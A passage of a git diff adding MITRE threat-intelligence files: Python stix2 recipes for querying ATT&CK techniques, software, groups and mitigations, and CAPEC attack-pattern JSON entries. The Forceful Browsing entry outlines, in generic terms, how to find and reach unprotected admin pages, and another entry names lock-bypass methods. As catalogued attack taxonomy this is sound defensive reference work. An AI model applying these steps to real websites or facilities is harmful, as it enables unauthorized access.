+from stix2 import Filter
+
+def get_techniques_or_subtechniques(thesrc, include="both"):
+ """Filter Techniques or Sub-Techniques from ATT&CK Enterprise Domain.
+ include argument has three options: "techniques", "subtechniques", or "both"
+ depending on the intended behavior."""
+ if include == "techniques":
+ query_results = thesrc.query([
+ Filter('type', '=', 'attack-pattern'),
+ Filter('x_mitre_is_subtechnique', '=', False)
+ ])
+ elif include == "subtechniques":
+ query_results = thesrc.query([
+ Filter('type', '=', 'attack-pattern'),
+ Filter('x_mitre_is_subtechnique', '=', True)
+ ])
+ elif include == "both":
+ query_results = thesrc.query([
+ Filter('type', '=', 'attack-pattern')
+ ])
+ else:
+ raise RuntimeError("Unknown option %s!" % include)
+
+ return query_results
+
+
+subtechniques = get_techniques_or_subtechniques(src, "subtechniques")
+subtechniques = remove_revoked_deprecated(subtechniques) # see https://github.com/mitre/cti/blob/master/USAGE.md#removing-revoked-and-deprecated-objects
+```
+
+##### Getting software
+
+Because software are the union of two STIX types (`tool` and `malware`), the process for accessing software is slightly more complicated.
+
+```python
+from itertools import chain
+from stix2 import Filter
+
+def get_software(thesrc):
+ return list(chain.from_iterable(
+ thesrc.query(f) for f in [
+ Filter("type", "=", "tool"),
+ Filter("type", "=", "malware")
+ ]
+ ))
+
+get_software(src)
+```
+
+#### Objects by content
+
+Sometimes it may be useful to query objects by the content of their description:
+
+```python
+from stix2 import Filter
+
+def get_techniques_by_content(thesrc, content):
+ techniques = src.query([ Filter('type', '=', 'attack-pattern') ])
+ return list(filter(lambda t: content.lower() in t.description.lower(), techniques))
+
+# Get all techniques where the string LSASS appears in the description
+get_techniques_by_content(src, 'LSASS')
+```
+
+#### Techniques by platform
+
+Techniques are associated with one or more platforms. You can query the techniques
+under a specific platform with the following code:
+
+```python
+from stix2 import Filter
+
+def get_techniques_by_platform(thesrc, platform):
+ return thesrc.query([
+ Filter('type', '=', 'attack-pattern'),
+ Filter('x_mitre_platforms', '=', platform)
+ ])
+
+# get techniques in the windows platform
+get_techniques_by_platform(src, 'Windows')
+```
+
+#### Techniques by tactic
+
+Techniques are related to tactics by their kill_chain_phases property.
+The `phase_name` of each kill chain phase corresponds to the `x_mitre_shortname` of a tactic.
+
+```python
+from stix2 import Filter
+
+def get_tactic_techniques(thesrc, tactic):
+ # double checking the kill chain is MITRE ATT&CK
+ # note: kill_chain_name is different for other domains:
+ # - enterprise: "mitre-attack"
+ # - mobile: "mitre-mobile-attack"
+ # - ics: "mitre-ics-attack"
+ return thesrc.query([
+ Filter('type', '=', 'attack-pattern'),
+ Filter('kill_chain_phases.phase_name', '=', tactic),
+ Filter('kill_chain_phases.kill_chain_name', '=', 'mitre-attack'),
+ ])
+
+
+# use the x_mitre_shortname as argument
+get_tactic_techniques(src, 'defense-evasion')
+```
+
+#### Tactics by matrix
+
+The tactics are individual objects (`x-mitre-tactic`), and their order in a matrix (`x-mitre-matrix`) is
+found within the `tactic_refs` property in a matrix. The order of the tactics in that list matches
+the ordering of the tactics in that matrix. The following recipe returns a structured list of tactics within each matrix of the input DataStore.
+
+```python
+from stix2 import Filter
+
+def getTacticsByMatrix(thesrc):
+ tactics = {}
+ matrix = thesrc.query([
+ Filter('type', '=', 'x-mitre-matrix'),
+ ])
+
+ for i in range(len(matrix)):
+ tactics[matrix[i]['name']] = []
+ for tactic_id in matrix[i]['tactic_refs']:
+ tactics[matrix[i]['name']].append(thesrc.get(tactic_id))
+
+ return tactics
+
+# get tactic layout
+getTacticsByMatrix(src)
+```
+
+#### Objects created or modified since a given date
+
+Sometimes you may want to get a list of objects which have been created or modified after a certain time.
+
+```python
+from stix2 import Filter
+
+def get_created_after(thesrc, timestamp):
+ filt = [
+ Filter('created', '>', timestamp)
+ ]
+ return thesrc.query(filt)
+
+get_created_after(src, "2018-10-01T00:14:20.652Z")
+
+
+def get_modified_after(thesrc, timestamp):
+ filt = [
+ Filter('modified', '>', timestamp)
+ ]
+ return thesrc.query(filt)
+
+get_modified_after(src, "2018-10-01T00:14:20.652Z")
+```
+
+We don't recommend you use this method to detect a change to the contents of the knowledge base. For detecting an update to the overall knowledge base we recommend using requests to [check the list of released versions of ATT&CK](https://github.com/mitre/cti/blob/master/USAGE.md#access-a-specific-version-of-attck).
+
+### Getting related objects
+
+A large part of working with ATT&CK revolves around parsing relationships between objects. It is useful
+to track not only the related object but the relationship itself because a description is often
+present to contextualize the nature of the relationship. The following recipes demonstrate
+some common uses of relationships.
+
+#### Relationships microlibrary
+
+NOTE: The following code is intended to be used with the ATT&CK v12 release which includes Campaign Objects.
+The examples are backwards-compatible for previous versions af ATT&CK that omit those objects.
+
+This microlibrary can be used to build a lookup table of stixID to related objects and relationships.
+The argument to each accessor function is a STIX2 MemoryStore to build the relationship mappings from.
+
+```python
+from pprint import pprint
+from stix2 import MemoryStore, Filter
+
+# See section below on "Removing revoked and deprecated objects"
+def remove_revoked_deprecated(stix_objects):
+ """Remove any revoked or deprecated objects from queries made to the data source"""
+ # Note we use .get() because the property may not be present in the JSON data. The default is False
+ # if the property is not set.
+ return list(
+ filter(
+ lambda x: x.get("x_mitre_deprecated", False) is False and x.get("revoked", False) is False,
+ stix_objects
+ )
+ )
+
+def get_related(thesrc, src_type, rel_type, target_type, reverse=False):
+ """build relationship mappings
+ params:
+ thesrc: MemoryStore to build relationship lookups for
+ src_type: source type for the relationships, e.g "attack-pattern"
+ rel_type: relationship type for the relationships, e.g "uses"
+ target_type: target type for the relationship, e.g "intrusion-set"
+ reverse: build reverse mapping of target to source
+ """
+
+ relationships = thesrc.query([
+ Filter('type', '=', 'relationship'),
+ Filter('relationship_type', '=', rel_type),
+ Filter('revoked', '=', False),
+ ])
+
+ # See section below on "Removing revoked and deprecated objects"
+ relationships = remove_revoked_deprecated(relationships)
+
+ # stix_id => [ { relationship, related_object_id } for each related object ]
+ id_to_related = {}
+
+ # build the dict
+ for relationship in relationships:
+ if src_type in relationship.source_ref and target_type in relationship.target_ref:
+ if (relationship.source_ref in id_to_related and not reverse) or (relationship.target_ref in id_to_related and reverse):
+ # append to existing entry
+ if not reverse:
+ id_to_related[relationship.source_ref].append({
+ "relationship": relationship,
+ "id": relationship.target_ref
+ })
+ else:
+ id_to_related[relationship.target_ref].append({
+ "relationship": relationship,
+ "id": relationship.source_ref
+ })
+ else:
+ # create a new entry
+ if not reverse:
+ id_to_related[relationship.source_ref] = [{
+ "relationship": relationship,
+ "id": relationship.target_ref
+ }]
+ else:
+ id_to_related[relationship.target_ref] = [{
+ "relationship": relationship,
+ "id": relationship.source_ref
+ }]
+ # all objects of relevant type
+ if not reverse:
+ targets = thesrc.query([
+ Filter('type', '=', target_type),
+ Filter('revoked', '=', False)
+ ])
+ else:
+ targets = thesrc.query([
+ 
Filter('type', '=', src_type),
+ Filter('revoked', '=', False)
+ ])
+
+ # build lookup of stixID to stix object
+ id_to_target = {}
+ for target in targets:
+ id_to_target[target.id] = target
+
+ # build final output mappings
+ output = {}
+ for stix_id in id_to_related:
+ value = []
+ for related in id_to_related[stix_id]:
+ if not related["id"] in id_to_target:
+ continue # targeting a revoked object
+ value.append({
+ "object": id_to_target[related["id"]],
+ "relationship": related["relationship"]
+ })
+ output[stix_id] = value
+ return output
+
+# software:group
+def software_used_by_groups(thesrc):
+ """returns group_id => {software, relationship} for each software used by the group and each software used by campaigns attributed to the group."""
+ # get all software used by groups
+ tools_used_by_group = get_related(thesrc, "intrusion-set", "uses", "tool")
+ malware_used_by_group = get_related(thesrc, "intrusion-set", "uses", "malware")
+ software_used_by_group = {**tools_used_by_group, **malware_used_by_group} # group_id -> [{software, relationship}]
+
+ # get groups attributing to campaigns and all software used by campaigns
+ software_used_by_campaign = get_related(thesrc, "campaign", "uses", "tool")
+ malware_used_by_campaign = get_related(thesrc, "campaign", "uses", "malware")
+ for id in malware_used_by_campaign:
+ if id in software_used_by_campaign:
+ software_used_by_campaign[id].extend(malware_used_by_campaign[id])
+ else:
+ software_used_by_campaign[id] = malware_used_by_campaign[id]
+ campaigns_attributed_to_group = {
+ "campaigns": get_related(thesrc, "campaign", "attributed-to", "intrusion-set", reverse=True), # group_id => {campaign, relationship}
+ "software": software_used_by_campaign # campaign_id => {software, relationship}
+ }
+
+ for group_id in campaigns_attributed_to_group["campaigns"]:
+ software_used_by_campaigns = []
+ # check if attributed campaign is using software
+ for campaign in 
campaigns_attributed_to_group["campaigns"][group_id]:
+ campaign_id = campaign["object"]["id"]
+ if campaign_id in campaigns_attributed_to_group["software"]:
+ software_used_by_campaigns.extend(campaigns_attributed_to_group["software"][campaign_id])
+
+ # update software used by group to include software used by a groups attributed campaign
+ if group_id in software_used_by_group:
+ software_used_by_group[group_id].extend(software_used_by_campaigns)
+ else:
+ software_used_by_group[group_id] = software_used_by_campaigns
+ return software_used_by_group
+
+def groups_using_software(thesrc):
+ """returns software_id => {group, relationship} for each group using the software and each software used by attributed campaigns."""
+ # get all groups using software
+ groups_using_tool = get_related(thesrc, "intrusion-set", "uses", "tool", reverse=True)
+ groups_using_malware = get_related(thesrc, "intrusion-set", "uses", "malware", reverse=True)
+ groups_using_software = {**groups_using_tool, **groups_using_malware} # software_id => {group, relationship}
+
+ # get campaigns attributed to groups and all campaigns using software
+ campaigns_using_software = get_related(thesrc, "campaign", "uses", "tool", reverse=True)
+ campaigns_using_malware = get_related(thesrc, "campaign", "uses", "malware", reverse=True)
+ for id in campaigns_using_malware:
+ if id in campaigns_using_software:
+ campaigns_using_software[id].extend(campaigns_using_malware[id])
+ else:
+ campaigns_using_software[id] = campaigns_using_malware[id]
+ groups_attributing_to_campaigns = {
+ "campaigns": campaigns_using_software,# software_id => {campaign, relationship}
+ "groups": get_related(thesrc, "campaign", "attributed-to", "intrusion-set") # campaign_id => {group, relationship}
+ }
+
+ for software_id in groups_attributing_to_campaigns["campaigns"]:
+ groups_attributed_to_campaigns = []
+ # check if campaign is attributed to group
+ for campaign in groups_attributing_to_campaigns["campaigns"][software_id]:
+ 
campaign_id = campaign["object"]["id"]
+ if campaign_id in groups_attributing_to_campaigns["groups"]:
+ groups_attributed_to_campaigns.extend(groups_attributing_to_campaigns["groups"][campaign_id])
+
+ # update groups using software to include software used by a groups attributed campaign
+ if software_id in groups_using_software:
+ groups_using_software[software_id].extend(groups_attributed_to_campaigns)
+ else:
+ groups_using_software[software_id] = groups_attributed_to_campaigns
+ return groups_using_software
+
+# software:campaign
+def software_used_by_campaigns(thesrc):
+ """returns campaign_id => {software, relationship} for each software used by the campaign."""
+ tools_used_by_campaign = get_related(thesrc, "campaign", "uses", "tool")
+ malware_used_by_campaign = get_related(thesrc, "campaign", "uses", "malware")
+ return {**tools_used_by_campaign, **malware_used_by_campaign}
+
+def campaigns_using_software(thesrc):
+ """returns software_id => {campaign, relationship} for each campaign using the software."""
+ campaigns_using_tool = get_related(thesrc, "campaign", "uses", "tool", reverse=True)
+ campaigns_using_malware = get_related(thesrc, "campaign", "uses", "malware", reverse=True)
+ return {**campaigns_using_tool, **campaigns_using_malware}
+
+# campaign:group
+def groups_attributing_to_campaign(thesrc):
+ """returns campaign_id => {group, relationship} for each group attributing to the campaign."""
+ return get_related(thesrc, "campaign", "attributed-to", "intrusion-set")
+
+def campaigns_attributed_to_group(thesrc):
+ """returns group_id => {campaign, relationship} for each campaign attributed to the group."""
+ return get_related(thesrc, "campaign", "attributed-to", "intrusion-set", reverse=True)
+
+# technique:group
+def techniques_used_by_groups(thesrc):
+ """returns group_id => {technique, relationship} for each technique used by the group and each
+ technique used by campaigns attributed to the group."""
+ # get all techniques used by groups
+ 
techniques_used_by_groups = get_related(thesrc, "intrusion-set", "uses", "attack-pattern") # group_id => {technique, relationship}
+
+ # get groups attributing to campaigns and all techniques used by campaigns
+ campaigns_attributed_to_group = {
+ "campaigns": get_related(thesrc, "campaign", "attributed-to", "intrusion-set", reverse=True), # group_id => {campaign, relationship}
+ "techniques": get_related(thesrc, "campaign", "uses", "attack-pattern") # campaign_id => {technique, relationship}
+ }
+
+ for group_id in campaigns_attributed_to_group["campaigns"]:
+ techniques_used_by_campaigns = []
+ # check if attributed campaign is using technique
+ for campaign in campaigns_attributed_to_group["campaigns"][group_id]:
+ campaign_id = campaign["object"]["id"]
+ if campaign_id in campaigns_attributed_to_group["techniques"]:
+ techniques_used_by_campaigns.extend(campaigns_attributed_to_group["techniques"][campaign_id])
+
+ # update techniques used by groups to include techniques used by a groups attributed campaign
+ if group_id in techniques_used_by_groups:
+ techniques_used_by_groups[group_id].extend(techniques_used_by_campaigns)
+ else:
+ techniques_used_by_groups[group_id] = techniques_used_by_campaigns
+ return techniques_used_by_groups
+
+def groups_using_technique(thesrc):
+ """returns technique_id => {group, relationship} for each group using the technique and each campaign attributed to groups using the technique."""
+ # get all groups using techniques
+ groups_using_techniques = get_related(thesrc, "intrusion-set", "uses", "attack-pattern", reverse=True) # technique_id => {group, relationship}
+
+ # get campaigns attributed to groups and all campaigns using techniques
+ groups_attributing_to_campaigns = {
+ "campaigns": get_related(thesrc, "campaign", "uses", "attack-pattern", reverse=True), # technique_id => {campaign, relationship}
+ "groups": get_related(thesrc, "campaign", "attributed-to", "intrusion-set") # campaign_id => {group, relationship}
+ }
+
+ for 
technique_id in groups_attributing_to_campaigns["campaigns"]:
+ campaigns_attributed_to_group = []
+ # check if campaign is attributed to group
+ for campaign in groups_attributing_to_campaigns["campaigns"][technique_id]:
+ campaign_id = campaign["object"]["id"]
+ if campaign_id in groups_attributing_to_campaigns["groups"]:
+ campaigns_attributed_to_group.extend(groups_attributing_to_campaigns["groups"][campaign_id])
+
+ # update groups using techniques to include techniques used by a groups attributed campaign
+ if technique_id in groups_using_techniques:
+ groups_using_techniques[technique_id].extend(campaigns_attributed_to_group)
+ else:
+ groups_using_techniques[technique_id] = campaigns_attributed_to_group
+ return groups_using_techniques
+
+# technique:campaign
+def techniques_used_by_campaigns(thesrc):
+ """returns campaign_id => {technique, relationship} for each technique used by the campaign."""
+ return get_related(thesrc, "campaign", "uses", "attack-pattern")
+
+def campaigns_using_technique(thesrc):
+ """returns technique_id => {campaign, relationship} for each campaign using the technique."""
+ return get_related(thesrc, "campaign", "uses", "attack-pattern", reverse=True)
+
+# technique:software
+def techniques_used_by_software(thesrc):
+ """return software_id => {technique, relationship} for each technique used by the software."""
+ techniques_by_tool = get_related(thesrc, "tool", "uses", "attack-pattern")
+ techniques_by_malware = get_related(thesrc, "malware", "uses", "attack-pattern")
+ return {**techniques_by_tool, **techniques_by_malware}
+
+def software_using_technique(thesrc):
+ """return technique_id => {software, relationship} for each software using the technique."""
+ tools_by_technique_id = get_related(thesrc, "tool", "uses", "attack-pattern", reverse=True)
+ malware_by_technique_id = get_related(thesrc, "malware", "uses", "attack-pattern", reverse=True)
+ return {**tools_by_technique_id, **malware_by_technique_id}
+
+# 
technique:mitigation
+def mitigation_mitigates_techniques(thesrc):
+ """return mitigation_id => {technique, relationship} for each technique mitigated by the mitigation."""
+ return get_related(thesrc, "course-of-action", "mitigates", "attack-pattern", reverse=False)
+
+def technique_mitigated_by_mitigations(thesrc):
+ """return technique_id => {mitigation, relationship} for each mitigation of the technique."""
+ return get_related(thesrc, "course-of-action", "mitigates", "attack-pattern", reverse=True)
+
+# technique:sub-technique
+def subtechniques_of(thesrc):
+ """return technique_id => {subtechnique, relationship} for each subtechnique of the technique."""
+ return get_related(thesrc, "attack-pattern", "subtechnique-of", "attack-pattern", reverse=True)
+
+def parent_technique_of(thesrc):
+ """return subtechnique_id => {technique, relationship} describing the parent technique of the subtechnique"""
+ return get_related(thesrc, "attack-pattern", "subtechnique-of", "attack-pattern")[0]
+
+# technique:data-component
+def datacomponent_detects_techniques(thesrc):
+ """return datacomponent_id => {technique, relationship} describing the detections of each data component"""
+ return get_related(thesrc, "x-mitre-data-component", "detects", "attack-pattern")
+
+def technique_detected_by_datacomponents(thesrc):
+ """return technique_id => {datacomponent, relationship} describing the data components that can detect the technique"""
+ return get_related(thesrc, "x-mitre-data-component", "detects", "attack-pattern", reverse=True)
+
+# Example usage:
+src = MemoryStore()
+src.load_from_file("path/to/enterprise-attack.json")
+
+group_id_to_software = software_used_by_groups(src)
+pprint(group_id_to_software["intrusion-set--2a158b0a-7ef8-43cb-9985-bf34d1e12050"]) # G0019
+# [
+# {
+# "object": Malware, # S0061
+# "relationship": Relationship # relationship between G0019 and S0061
+# },
+# {
+# ... 
+# } +# ] +``` + +#### Getting techniques used by a group's software + +Because a group uses software, and software uses techniques, groups can be considered indirect users of techniques used by their software. +These techniques are oftentimes distinct from the techniques used directly by a group, although there are occasionally intersections in these two sets of techniques. + +The following recipe can be used to retrieve the techniques used by a group's software: + +```python +from stix2.utils import get_type_from_id +from stix2 import Filter + +def get_techniques_by_group_software(thesrc, group_stix_id): + # get the malware, tools that the group uses + group_uses = [ + r for r in thesrc.relationships(group_stix_id, 'uses', source_only=True) + if get_type_from_id(r.target_ref) in ['malware', 'tool'] + ] + + # get the technique stix ids that the malware, tools use + software_uses = thesrc.query([ + Filter('type', '=', 'relationship'), + Filter('relationship_type', '=', 'uses'), + Filter('source_ref', 'in', [r.source_ref for r in group_uses]) + ]) + + #get the techniques themselves + return thesrc.query([ + Filter('type', '=', 'attack-pattern'), + Filter('id', 'in', [r.target_ref for r in software_uses]) + ]) + +get_techniques_by_group_software(src, "intrusion-set--f047ee18-7985-4946-8bfb-4ed754d3a0dd") +``` + +### Working with deprecated and revoked objects + +Objects that are deemed no longer beneficial to track as part of the knowledge base are marked as deprecated, and objects which are replaced by a different object are revoked. In both cases, the old object is marked with a field (either `x_mitre_deprecated` or `revoked`) noting their status. In the case of revoked objects, a relationship of type `revoked-by` is also created targeting the replacing object. + +Unlike other objects in the dataset, relationships cannot be revoked or deprecated. Relationships are considered deprecated/revoked if one of the objects it is attached to is revoked or deprecated. 
+
+#### Removing revoked and deprecated objects
+
+Revoked and deprecated objects are kept in the knowledge base so that workflows relying on those objects are not
+broken. We recommend you filter out revoked and deprecated objects from your views whenever possible since they are no
+longer maintained by ATT&CK.
+
+We recommend _not_ using built-in STIX filters for removing revoked objects (e.g `Filter('revoked', '=', False)`). This is because the behavior of this specific filter is inconsistent depending on the method of access (using local data or accessing via the TAXII server). We recommend using the following code example to filter revoked objects instead. See [issue #127](https://github.com/mitre/cti/issues/127) for more details.
+
+```python
+from stix2 import Filter
+
+def remove_revoked_deprecated(stix_objects):
+ """Remove any revoked or deprecated objects from queries made to the data source"""
+ # Note we use .get() because the property may not be present in the JSON data. The default is False
+ # if the property is not set.
+ return list(
+ filter(
+ lambda x: x.get("x_mitre_deprecated", False) is False and x.get("revoked", False) is False,
+ stix_objects
+ )
+ )
+
+mitigations = src.query([ Filter("type", "=", "course-of-action") ])
+mitigations = remove_revoked_deprecated(mitigations)
+```
+
+#### Getting a revoking object
+
+When an object is replaced by another object, it is marked with the field `revoked` and a relationship of type `revoked-by` is created where the `source_ref` is the revoked object and the `target_ref` is the revoking object.
This relationship can be followed to find the replacing object:
+
+```python
+from stix2 import Filter
+
+def getRevokedBy(stix_id, thesrc):
+ relations = thesrc.relationships(stix_id, 'revoked-by', source_only=True)
+ revoked_by = thesrc.query([
+ Filter('id', 'in', [r.target_ref for r in relations]),
+ Filter('revoked', '=', False)
+ ])
+ if revoked_by is not None:
+ revoked_by = revoked_by[0]
+
+ return revoked_by
+
+getRevokedBy("attack-pattern--c16e5409-ee53-4d79-afdc-4099dc9292df", src)
+```
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6.json
new file mode 100644
index 0000000000000000000000000000000000000000..2a10ac5ca3f9147ccc337112a7b040eb0ade66ff
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6.json
@@ -0,0 +1,88 @@
+{
+ "id": "bundle--3854e44a-10ea-4970-8e82-5db4b70ba65e",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "An attacker employs forceful browsing (direct URL entry) to access portions of a website that are otherwise unreachable. Usually, a front controller or similar design pattern is employed to protect access to portions of a web application. Forceful browsing enables an attacker to access information, perform privileged operations and otherwise reach sections of the web application that have been improperly protected.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-87",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/87.html"
+ },
+ {
+ "external_id": "CWE-425",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/425.html"
+ },
+ {
+ "external_id": "CWE-285",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/285.html"
+ },
+ {
+ "external_id": "CWE-693",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/693.html"
+ },
+ {
+ "description": "Predictable Resource Location",
+ "external_id": "34",
+ "source_name": "WASC",
+ "url": "http://projects.webappsec.org/Predictable-Resource-Location"
+ },
+ {
+ "description": "Forced browsing",
+ "source_name": "OWASP Attacks",
+ "url": "https://owasp.org/www-community/attacks/Forced_browsing"
+ }
+ ],
+ "id": "attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6",
+ "modified": "2020-12-17T00:00:00.000Z",
+ "name": "Forceful Browsing",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Standard",
+ "x_capec_child_of_refs": [
+ "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a"
+ ],
+ "x_capec_consequences": {
+ "Access_Control": [
+ "Bypass Protection Mechanism"
+ ],
+ "Authorization": [
+ "Bypass Protection 
Mechanism"
+ ],
+ "Confidentiality": [
+ "Read Data",
+ "Bypass Protection Mechanism"
+ ]
+ },
+ "x_capec_domains": [
+ "Software"
+ ],
+ "x_capec_example_instances": [
+ "\n A bulletin board application provides an administrative interface at admin.aspx when the user logging in belongs to the administrators group.\n An attacker can access the admin.aspx interface by making a direct request to the page. Not having access to the interface appropriately protected allows the attacker to perform administrative functions without having to authenticate themself in that role.\n "
+ ],
+ "x_capec_execution_flow": "

Execution Flow

Explore

  1. Spider: Using an automated tool, an attacker follows all public links on a web site. They record all the links they find.

  2. Techniques
    Use a spidering tool to follow and record all links.
    Use a proxy tool to record all links visited during a manual traversal of the web application.

Experiment

  1. Attempt well-known or guessable resource locations: Using an automated tool, an attacker requests a variety of well-known URLs that correspond to administrative, debugging, or other useful internal actions. They record all the positive responses from the server.

  2. Techniques
    Use a spidering tool to follow and record attempts on well-known URLs.
    Use a proxy tool to record all links visited during a manual traversal of attempts on well-known URLs.

Exploit

  1. Use unauthorized resources: By visiting the unprotected resource, the attacker makes use of unauthorized functionality.

  2. Techniques
    Access unprotected functions and execute them.
  3. View unauthorized data: The attacker discovers and views unprotected sensitive data.

  4. Techniques
    Direct request of protected pages that directly access database back-ends. (e.g., list.jsp, accounts.jsp, status.jsp, etc.)
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The forcibly browseable pages or accessible resources must be discoverable and improperly protected." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. A directory listing is helpful, but not a requirement." + ], + "x_capec_skills_required": { + "Low": "Forcibly browseable pages can be discovered by using a number of automated tools. Doing the same manually is tedious but by no means difficult." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0082c733-5245-47ca-a349-6c9fe34114f1.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0082c733-5245-47ca-a349-6c9fe34114f1.json new file mode 100644 index 0000000000000000000000000000000000000000..78bb47c317cab634854951db79640ea1d2a8fbcc --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0082c733-5245-47ca-a349-6c9fe34114f1.json 
@@ -0,0 +1,29 @@
+{
+ "id": "bundle--e5816f1d-9092-4885-a6c2-a171216583ed",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern. Please refer to CAPEC-118 : Collect and Analyze Information.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-409",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/409.html"
+ }
+ ],
+ "id": "attack-pattern--0082c733-5245-47ca-a349-6c9fe34114f1",
+ "modified": "2018-07-31T00:00:00.000Z",
+ "name": "DEPRECATED: Information Gathering from Non-Traditional Sources",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Meta",
+ "x_capec_status": "Deprecated",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97.json
new file mode 100644
index 0000000000000000000000000000000000000000..e5cdd16da49f61ac9ffa5218d58e0409a16ffa21
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97.json
@@ -0,0 +1,45 @@ +{ + "id": "bundle--1fb1c501-9ddd-4631-957c-e93abe88c5c6", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses techniques and methods to bypass physical security measures of a building or facility. Physical locks may range from traditional lock and key mechanisms, cable locks used to secure laptops or servers, locks on server cases, or other such devices. Techniques such as lock bumping, lock forcing via snap guns, or lock picking can be employed to bypass those locks and gain access to the facilities or devices they protect, although stealth, evidence of tampering, and the integrity of the lock following an attack, are considerations that may determine the method employed. Physical locks are limited by the complexity of the locking mechanism. While some locks may offer protections such as shock resistant foam to prevent bumping or lock forcing methods, many commonly employed locks offer no such countermeasures.", + "external_references": [ + { + "external_id": "CAPEC-391", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/391.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Bypassing Physical Locks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8ba08815-66fb-4150-a7fa-8ab6d1472b5f" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--4068bee0-b331-49e8-872e-98429a3c374a", + 
"attack-pattern--9996317e-313b-456c-8bc8-491dbb53b368", + "attack-pattern--aea87f07-9619-4bc5-9790-01bf3423c494" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17.json new file mode 100644 index 0000000000000000000000000000000000000000..c6468c4afb4ed1921bde730bd4d975786ea85c40 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17.json 
@@ -0,0 +1,77 @@ +{ + "id": "bundle--da81b06e-418a-4798-97f9-f4c8cb5d3327", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack relies on the adversary using unexpected formats for representing IP addresses. Networked applications may expect network location information in a specific format, such as fully qualified domains names (FQDNs), URL, IP address, or IP Address ranges. If the location information is not validated against a variety of different possible encodings and formats, the adversary can use an alternate format to bypass application access control.", + "external_references": [ + { + "external_id": "CAPEC-4", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/4.html" + }, + { + "external_id": "CWE-291", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/291.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "description": "G. Hoglund, G. 
